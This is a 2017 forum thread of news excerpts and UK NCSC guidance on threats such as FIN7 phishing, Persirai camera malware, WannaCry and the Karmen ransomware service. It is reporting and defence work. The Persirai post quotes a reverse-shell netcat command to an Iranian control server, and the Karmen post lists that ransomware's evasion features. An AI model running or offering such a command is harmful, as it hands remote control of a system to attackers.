SMALL WARS COUNCIL
Go Back   Small Wars Council > Small Wars Participants & Stakeholders > Media, Information & Cyber Warriors

Media, Information & Cyber Warriors Getting the story, dealing with those who do, and operating in the information & cyber domains. Not the news itself, that's here.

Reply
 
Thread Tools Display Modes
Old 05-01-2017   #21
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

According to the experts from security firm FireEye, the financially-motivated FIN7 group is changing hacking techniques.

Quote:
The group that has been active since late 2015, and was recently spotted to have been targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

The FIN7 group has adopted new phishing techniques, it is leveraging on hidden shortcut files (LNK files) to compromise targets.

Experts from FireEye highlighted that attacks were launched by FIN7 group and not the Carbanak Group as suspected by other security experts.

“FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7.” reads the analysis published by FireEye. “FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.”

Experts from FireEye distinguish the activity associated with the FIN7 group to the one attributed to CARBANAK.

Security experts discovered a string of fileless malware attacks last month that have been powered by the same hacking framework.

The last attacks attributed to FIN7 recently spotted did not use weaponized Microsoft Office, hackers switched to hidden shortcut files (LNK files) as an attack vector to launch “mshta.exe”. Then FIN7 hackers used the VBScript functionality launched by mshta.exe to compromise the victim’s system.

“In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.” reads the analysis.

Hackers leveraged on spear phishing emails using malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique.

The DOCX and RTF files attempt to convince the user to double-click included images.

“both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document” states the analysis.

FIN7 group campaign

“In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique.”

The ongoing campaign targeted large restaurant chains, hospitality, and financial service organizations, threat actors used phishing messages themed as complaints, catering orders, or resumes. To improve the efficiency of the campaign the FIN7 hackers were also calling the targets to make sure they received the email.

According to the experts, this new phishing scheme is more effective respect previous ones.

“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” state the researchers.

Hackers used a multilayer obfuscated PowerShell script that once launched executes shellcode for a Cobalt Strike stager. The shellcode downloads an additional payload from a specific C&C server using DNS aaa.stage.14919005.www1.proslr3[.]com, if the reply is successful, the PowerShell executes the embedded Cobalt Strike.

The FIN7 group also used the HALFBAKED backdoor in the ongoing attacks.

FireEye researchers examined shortcut LNK files created by attackers that allowed them to reveal valuable information attackers environment.

One of the LNK files used by hackers in the last campaign revealed some specific information about the attackers, for example, that the hackers likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
OUTLAW 09 is offline   Reply With Quote
Old 05-01-2017   #22
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

The Hacking Team hack involved a databreach of over 600Gs of data..Tools...source code and emails....all posted on the net gfor Review and use...

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.

Quote:
According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case, the experts of the company reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”

The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the group, the Callisto APT continues to be active, the experts observed the last malware in February 2016, meanwhile, they continue setting up new phishing infrastructure on weekly bases.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.
OUTLAW 09 is offline   Reply With Quote
Old 05-03-2017   #23
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

CRITICAL


PSA: someone is spreading a massive Gmail phishing email right now. DO NOT CLICK on the Google Doc link.
https://motherboard.vice.com/en_us/a...hishing-email#

(Added by Mod) orhttp://www.independent.co.uk/life-st...-a7716581.html

Last edited by davidbfpo; 05-03-2017 at 10:00 PM. Reason: Moved from Russian Disinformation thread
OUTLAW 09 is offline   Reply With Quote
Old 05-04-2017   #24
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

In other infosec news, German bank hackers used SS7 hijacking to steal SMS 2FA tokens and drain accounts [in German]

http://www.sueddeutsche.de/digital/i...leer-1.3486504

European and US telco providers have known about this major issue since 2014 and failed to implement stronger available security features.....and we are now in 2017....

I would be interested to know if this is a coincidence with the Trend Micro report on Friday, or someone making an OAUTH bomb after reading it.

Last edited by OUTLAW 09; 05-04-2017 at 07:30 AM.
OUTLAW 09 is offline   Reply With Quote
Old 05-04-2017   #25
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Reference the Google Gmail phishing attack yesterday.....

Shout out to @Google security ppl who got the #OAuthWorm disabled in under an hour and to @Cloudflare for sinkholing. Great response.

Was the attack actually generated after reading the Micro Trend report on the Russian state sponsored French hacking of Marcon using OAuth?

Not clear who's behind the attack, but conspicuously similar MO to a major APT28 campaign last year disclosed by Trend Micro last Friday.

This big phishing attack is clever; an OAUTH based attack. Tricks you into giving "permission" to read your emails a fake Google Docs app.

Password Alert is a free Chrome extension that journalists (or anyone) can use to protect against phishing
https://goo.gl/vrIEkA# #WPDF2017

A good video of the actual attack in progress....

https://twitter.com/zachlatta/status/859843151757955072

Last edited by OUTLAW 09; 05-04-2017 at 07:44 AM.
OUTLAW 09 is offline   Reply With Quote
Old 05-11-2017   #26
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Apple has recently fixed an iCloud Keychain vulnerability that could have been exploited by hackers to steal sensitive data from iCloud users.

The flaw allowed hackers to run man-in-the-middle (MitM) attacks to obtain sensitive user information (i.e. names, passwords, credit card data, and Wi-Fi network information).

The researcher Alex Radocea of Longterm Security discovered in March a vulnerability tracked as CVE-2017-2448 that affects the iCloud Keychain
OUTLAW 09 is offline   Reply With Quote
Old 05-11-2017   #27
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

http://securityaffairs.co/wordpress/...os-botnet.html

A really great article..well worth reading for those that follow this type of infomation....

The Rakos botnet – Exploring a P2P Transient Botnet From Discovery to Enumeration
May 10, 2017# By#Pierluigi#Paganini

Quote:
1. Introduction
We recently deployed a high interaction honeypots#expecting it to be compromised by a specific malware. But in the first few days, instead of getting infected by the expected malware, it received a variety of attacks ranging from SSH port forwarding to “Viagra and Cialis” SPAM to XORDDoS failed deployment attempts. By the third day, it was insistently hit and compromised by Rakos, a Linux/Trojan.
Based on the expected Rakos behavior reported last December by ESET [1], our honeypot was recruited to a botnet and immediately began attempting connections to other hosts on the Internet, both to “call home” and to search for new victims. Although it wasn’t our initial plan, we noticed that this sample didn’t behave like the one ESET described, which got us curious and made us analyze it here at Morphus Labs.
After analyzing and exploiting this botnet’s communication channel and employing Crawling and Sensor Injection enumeration methods, we did find a network floating around 8,300 compromised devices per day spread over 178 countries worldwide. Considering the recent DDoS attack reported by Incapsula [2] against a US College, originated from 9,793 bots, which was able to generate 30,000 requests per second during 54 hours, we may infer how potentially threatening is Rakos botnet.
2. Botnet C&C channel analysis
To better understand this P2P Transient botnet behavior and its C&C protocol, we listened to its traffic for 24 hours, and after analyzing it, we noticed two kinds of communications: one between bots through HTTP and, the other, between bots and C&C servers through TLS/SSL. In this section, we detail the commands we mapped.
Some definitions before start:
Checker: An infected machine (“bot”) that is part of the botnet.
Skaro: C&C server
A particular node may play both roles

Continued.....
The other graph shows the real interconnection between nodes, as seen in Figure 6. Here we can see a very thick botnet where#virtually#all Checkers know all Skaros.
Now, plotting the discovery path graph on the world map, as seen in Figure 7, we may have an idea of the botnet worldwide. To geolocalize the nodes, we used MaxMind database [8].
Attached Images
File Type: jpg chart.jpg (6.3 KB, 20 views)
File Type: jpg chart1.jpg (11.7 KB, 20 views)
File Type: jpg chart2.jpg (16.6 KB, 20 views)

Last edited by OUTLAW 09; 05-11-2017 at 08:40 AM.
OUTLAW 09 is offline   Reply With Quote
Old 05-13-2017   #28
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

[B]New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack

Quote:
Trend Micro has discovered a new attack on internet-based IP cameras and recorders. The new Internet of Things (IOT) attack called ELF_PERSIRAI has also been back-tracked to an Iranian research institute which restricts its use to Iranians only, indicating a possible state sponsored cyber strike by Tehran.
“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.
IP Camera users have also encounter the malware attack and noted its point of origin appears to be Iran.
“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.
The attack is based on the previously successful Mirai IOT strike against IP cameras that was used to disrupt the Internet with a giant Denial of Service (DOS) attack in 2016. However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China with only small fraction located outside of the PRC; in Italy (3%), the UK (3%) and the USA (8%).
The Persirai attack is disturbing on a number of fronts.# Its base on the open-source Mirai strike shows that the freely available source code will be modified by attackers to strike again in different forms.# Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.
Yet, the worst feature is that the command and control computers used to run the malicious bot-net are using the country code of IR or Iran.# Infected IP cameras report to command servers at:

load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103

The Persirai attack installs itself and then deletes the installation files to hide its presence on the target camera, running in memory only. It then proceeds to download and install additional control software and blocking software. Once communications are established with the command and control network server, the infected camera is then ordered to search for other cameras and infect them as well.

Persirai blocks other zero-day exploits from gaining access to a targeted IP Camera by pointing ftpupdate.sh and ftpupload.sh to /dev/null, preventing other attacks. This feature may be an effort to prevent duplicate attacks by Persirai as much as to prevent other bot-net attackers from gaining control of the now captured IP Camera. The fact that Persirai is running in memory does mean it is also eliminated once the IP Camera is rebooted but, unless the user takes counter-measures, the targeted system will still be vulnerable to the exploit.

While Trend Micro advises IP Camera users to use strong passwords, the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords.# A better counter-measure is to disable Universal Plug and Play (UPnP) features on your router.# Universal Plug and Play (UPnP) is a network protocol that allows devices such as IP Cameras to open a port on the router and act like a server.# This feature also makes the attached devices highly visible targets for the Persirai malware attack.
Users can also simply remove their IP Camera systems from Internet access altogether and then set up a private VPN service to allow them to log into the cameras by remote.# Users are also advised to update their firmware on their IP Cameras and maintain a close inspection of any web address linked activity.
The Persirai attack is part of a new trend to strike at the Internet via devices not traditionally viewed as computers.# These malware strikes illustrate the issue of vendors selling hardware with little or no security.# There are no current regulations or standards for IOT device security.# Consumers are literally left on their own and frequently choose low cost systems which have no security features such as encryption or even manufacturer updates.
While many IOT users are aware enough to update their computers and cell phones with the latest software and perform anti-virus checks, they are not aware that other devices such as cameras, washing machines, refrigerators and DVR recorders may also require security checks.# Even DVD players and smart TVs from major manufacturers are vulnerable to exploits as illustrated by the Wikileaks release of the WEEPING ANGEL attacks developed by the CIA in co-operation with the UK’s GCHQ spy agency which attacked Samsung TVs.
Details from Trend Micro on Persirai:
http://blog.trendmicro.com/trendlabs...ts-ip-cameras/

Last edited by davidbfpo; 05-13-2017 at 09:15 AM. Reason: Moved from Russian Disinformation thread
OUTLAW 09 is offline   Reply With Quote
Old 05-13-2017   #29
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

A Security researcher discovered that a Conexant audio driver shipped with dozens HP laptops and tablet PCs logs keystrokes.

Quote:
Security researcher Thorsten Schroeder of security firm Modzero discovered that a Conexant audio driver shipped with many HP laptops and tablet PCs logs keystrokes. The expert discovered that#MicTray64.exe application, which is installed with the Conexant audio driver package,is registered as a scheduled task in Windows systems and is able to monitor keystrokes to determine if the user has pressed any audio-related keys (e.g. mute/unmute).

The keystrokes are logged to a file in the Users/Public folder Furthermore and are passed on to the OutputDebugString debugging API, allowing a process to access the data via the MapViewOfFile function.

Unfortunately, this feature can be abused to steal user data such as login credentials, a malware could access keystrokes without triggering security solutions monitoring for suspicious activities.

The researcher observed that an earlier version of the MicTray64 app released in December 2015 did not log keystrokes to a file, the dangerous feature was implemented starting from the version 1.0.0.46 released in October 2016.

“Actually, the purpose of the software is to recognize whether a special key has been pressed or released. Instead, however, the developer has introduced a number of diagnostic and debugging features to ensure that all keystrokes are either broadcasted through a debugging interface or written to a log file in a public directory on the hard-drive. This type of debugging turns the audio driver effectively into a keylogging spyware. On the basis of meta-information of the files, this keylogger has already existed on HP computers since at least Christmas 2015.”#Schroeder wrote in a blog post.

“There is no evidence that this keylogger has been intentionally implemented. Obviously, it is a negligence of the developers – which makes the software no less harmful,”

The flaw, tracked as CVE-2017-8360, affects 28 HP laptops and tablet PCs, including EliteBook, Elite X2, ProBook, and ZBook models. The experts at Modzero speculate other devices manufactured by other vendors that use Conexant hardware and drivers could be affected.
Users are invited to delete the MicTray64from \Windows\System32 and the MicTray.log log file from \Users\Public.


HP plans to fix the issue as soon as possible.

Last edited by davidbfpo; 05-13-2017 at 09:15 AM. Reason: Moved from Russian Disinformation thread
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #30
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

I find the NYTs op ed leading line "MicroSoft should have done more for computer users other than for their legally registered customers".

This is interesting for a number of reasons....software producers have for years complained about copyright violations, black copies...etc..and it does in the end drive up the overall cost of their products as they factor that into their own product pricing..to make up for the loss of a sale.

On the other hand do software prices have to be high as the actually cost of manufacturing millions of CDs these days is virtually nothing in the actual sales price....they argue that must continually evolve the product, support the product and sell the product all costs of doing business...

So should a software manufacturer be responsible for the protection of unlicensed end users who have paid nothing for the product??

Or say in the case of Russia the hardest hit...an entire nation state running on illegally copied and or stolen software?? AND then MS is suppose to shallow those costs???

Last edited by davidbfpo; 05-14-2017 at 08:30 AM. Reason: Moved to here from Russian cyber thread
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #31
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

The latest NCSC (UK) guidance on Ransomware

The NCSC are aware of a ransomware campaign relating to version 2 of the “WannaCry” malware affecting a wide range of organisations globally.# NCSC are working with affected organisations and partners to investigate and coordinate the response in the UK.

From investigations and analysis performed to date, we know that the malware encrypts files, provides the user with a prompt which includes; a ransom demand, a countdown timer and bitcoin wallet to pay the ransom into.

The malware uses the vulnerability MS17-010 to propagate through a network using the SMBv1 protocol. This enables the malware to infect additional devices connected to the same network.

The NCSC advise the following steps be performed in order to contain the propagation of this malware:
Deploy patch MS17-010:
https://technet.microsoft.com/en-us/.../ms17-010.aspx

A new patch has been made available for legacy platforms, and is available here:
https://blogs.technet.microsoft.com/...acrypt-attacks

If it is not possible to apply this patch, disable SMBv1.#There is guidance here:
https://support.microsoft.com/en-us/help/2696547

and/or block SMBv1 ports on network devices [UDP 137, 138#and TCP 139, 445]
If these steps are not possible, propagation can be prevented by shutting down vulnerable systems.

Work done in the security research community has prevented a number of potential compromises. To benefit from this, a system must be able to resolve and connect to the domain below at the point of compromise.
www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Unlike most malware infections, your IT department should not block this domain.

Anti-virus vendors are increasingly becoming#able to detect and remediate this malware, therefore updating antivirus products will provide additional protection (though this will not recover any data that has already been encrypted).

The NCSC have previously published broader guidance on protecting your organisation from ransomware.
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #32
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Hackers are selling fake diplomas and certifications in the dark web
According to Israeli threat intelligence firm Sixgill, certifications and fake diplomas are very cheap and easy to buy in the dark web. It is quite easy to buy in dark#web marketplaces#any kind of illegal product and service, including#fake#certifications...
Attached Images
File Type: jpg photo4.jpg (13.4 KB, 12 views)
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #33
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Karmen Ransomware, a cheap RaaS service that implements anti-analysis features

Security experts from threat intelligence firm#Recorded Future have spotted a new ransomware as a service (RaaS) called Karmen. The service allows customers to easy create their ransomware campaign in a few steps and without specific skills.
Wannabe-crooks also track infected systems via a “Clients” tab, the Dashboard implements an efficient and easy to use cockpit that include various information such as the number of infected machines, earned revenue, and available updates for the malware.
The Karmen RaaS is very cheap, it costs just $175, buyers can decide the ransom#prices and the duration of the period in which the victims can pay the ransom.
The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the#Turkish security researchers Utku Sen for educational purposes.
The first Karmen infections#were reported in December 2016, the malware infected machines in Germany and the United States.
The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.
The malware is .NET dependent and requires PHP 5.6 and MySQL.
“On March 4, 2017, a member of a top-tier cyber criminal community with the username “Dereck1” mentioned a new ransomware variant called “Karmen.” reported a blog post published by Recorded Future.
“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”
“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”
Once infected a machine, the ransomware displays a ransom note with payment instructions, unlike similar malware, the Karmen ransomware#automatically deletes the decryptor when detecting a sandbox environment or any other analysis software.
“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.
Below the list of ransomware features#provided by DevBitox:
Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The#ransomware is available for sale in both light and full versions, the light version doesn’t include anti-analysis features.
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #34
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Global ‘Wana’ Ransomware Outbreak Earned Perpetrators $26,000 So Far
OUTLAW 09 is offline   Reply With Quote
Old 05-14-2017   #35
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Wcry ransomware is reborn without its killswitch, starts spreading anew


Quote:
Yesterday, the world got a temporary respite from the virulent Wcry ransomware worm, which used a leaked NSA cyberweapon to spread itself to computers all over the world, shutting down hospitals, financial institutions, power companies, business, and private individuals' computers, demanding $300 to reactivate them.

The respite was thanks to a sloppy bit of programming from the worm's creator, who'd left a killswitch in the code: newly infected systems checked to see if a certain domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) existed before attempting to spread the infection; by registering this domain, security researchers were able to freeze the worm.

But a day later, it's back, and this time, without the killswitch. Security researchers running honeypots have seen new infections by versions of the worm that can spread even when the iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain is live.

"I can confirm we've had versions without the kill switch domain connect since yesterday," Costin Raiu, director of global research and analysis team at Kaspersky Lab told Motherboard on Saturday.
OUTLAW 09 is offline   Reply With Quote
Old 05-15-2017   #36
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Microsoft officially confirms @NSAGov developed the flaw that brought down hospitals this weekend.
https://blogs.microsoft.com/on-the-i...-cyberattack/#
OUTLAW 09 is offline   Reply With Quote
Old 05-15-2017   #37
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Troy Hunt: Everything you need to know about the WannaCry / Wcry / WannaCrypt ransomware
https://www.troyhunt.com/everything-...t-ransomware/#
OUTLAW 09 is offline   Reply With Quote
Old 05-15-2017   #38
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Ransomware hits small number of U.S. critical infrastructure operators: official
http://reut.rs/2pNAgIR

Last edited by OUTLAW 09; 05-15-2017 at 04:34 PM.
OUTLAW 09 is offline   Reply With Quote
Old 05-15-2017   #39
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 35,747
Default

Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack
Attached Images
File Type: jpg photo4.jpg (67.6 KB, 8 views)
OUTLAW 09 is offline   Reply With Quote
Old 05-15-2017   #40
davidbfpo
Council Member
 
davidbfpo's Avatar
 
Join Date: Mar 2006
Location: UK
Posts: 11,020
Default After the horse has bolted

The National Cyber Security Centre, the NCSC (UK and part of GCHQ), has publishedtechnical guidance, which includes specific software patches to use that will prevent uninfected computers on your network from becoming infected with the “WannaCry” Ransomware:https://www.ncsc.gov.uk/guidance/ran...-ncsc-guidance

For additional in-depth technical guidance on how to protect your organisation from ransomware, details can be found here:https://www.ncsc.gov.uk/guidance/pro...ion-ransomware

The Soufan Group's commentary:http://www.soufangroup.com/tsg-intel...omware-attack/
__________________
davidbfpo

Last edited by davidbfpo; 05-15-2017 at 10:45 PM.
davidbfpo is offline   Reply With Quote
Reply

Bookmarks

Tags
cyber, malware, threats

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Russo-Ukraine War 2016 (April-June) davidbfpo Europe 1088 07-01-2016 08:44 PM
Leadership of Cyber Warriors: Enduring Principles and New Directions SWJ Blog Media, Information & Cyber Warriors 0 07-11-2011 02:41 PM
USAF Cyber Command (catch all) selil Media, Information & Cyber Warriors 150 03-15-2011 09:50 PM
Beijing’s Doctrine on the Conduct of “Irregular Forms of Warfare” Jedburgh Asia-Pacific 51 01-08-2011 06:42 PM
Question 5: Cyber space (oh you know I had to ask at least one of these) selil TRADOC Senior Leaders Conference 7 08-14-2009 03:27 PM


All times are GMT. The time now is 11:10 PM.


Powered by vBulletin® Version 3.8.9. ©2000 - 2017, Jelsoft Enterprises Ltd.
Registered Users are solely responsible for their messages.
Operated by, and site design © 2005-2009, Small Wars Foundation